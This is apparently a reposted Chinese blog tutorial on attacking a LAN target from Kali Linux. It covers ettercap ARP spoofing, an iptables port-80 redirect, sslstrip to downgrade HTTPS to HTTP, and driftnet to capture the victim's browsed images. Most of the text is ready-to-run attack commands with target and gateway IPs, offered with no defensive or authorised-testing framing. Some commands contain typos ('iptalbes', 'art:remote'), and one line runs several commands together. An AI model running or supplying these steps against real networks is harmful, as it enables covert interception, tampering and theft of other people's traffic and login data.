ettercap的中间人欺骗+sslstrip过滤掉https协议
Posted 方方和圆圆
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ettercap的中间人欺骗+sslstrip过滤掉https协议相关的知识,希望对你有一定的参考价值。
环境准备:kali系统
因为kali系统自带ettercap,比较方便, 不需要安装
ifcofing命令查看当前网关 ,当前的IP是: 172.16.42.1
查找局域网所有主机
通过netdiscover获取到当前目标IP:172.16.42.131
启动ettercap
启动ettercap , wlan0为网卡端口, -T为文字显示, -M art:remote为双向arp欺骗, /172.16.42.131//为攻击的目标机器IP , /172.16.42.1//为网关地址(注, 在不同系统和不同的ettercap版本中, 参数可能不一样, 具体要看你的环境和ettercap版本)
ettercap -i wlan0 -T -M arp:remote /172.16.42.131// /172.16.42.1//
过滤https协议成http
重新打开一个命令行窗口,分别执行下面三个命令行,
echo 1 > /proc/sys/net/ipv4/ip_forward 开启数据重定向
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 10000 开启80端口的数据转发到10000端口
sslstrip -l 10000 执行sslstrip欺骗,把网页中的https协议转换为http协议
echo 1 > /proc/sys/net/ipv4/ip_forward
iptalbes -t nat -F //清除类型为nat的iptables iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 sslstrip -l 10000
iptables -t nat -L //查看iptables列表是否生效
当用户浏览的网页中包含https协议,会被转化为http协议的请求
但是sslstrip也不是万能的, 假如网页中没有https, 但是js代码绑定了跳转到https的协议请求的事件, , 那么sslstrip就失效了
如果用户打开网页的时候请求就是https, 会导致证书认证失败, 网页一直打不开
获取所有的图片信息
执行arp欺骗以后, 目标机器所有的流量都会走我们的主机, 通过监听wlan0网卡, 我们可以获取和篡改目标机器的所有http请求数据和内容
启动driftnet监听wlan0端口, 查看所有的浏览图片数据, 所有的浏览图片,尽收眼底:
driftnet -i wlan0
作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830
以上是关于ettercap的中间人欺骗+sslstrip过滤掉https协议的主要内容,如果未能解决你的问题,请参考以下文章
Kali利用Ettercap实现中间人攻击之DNS劫持(DNS欺骗)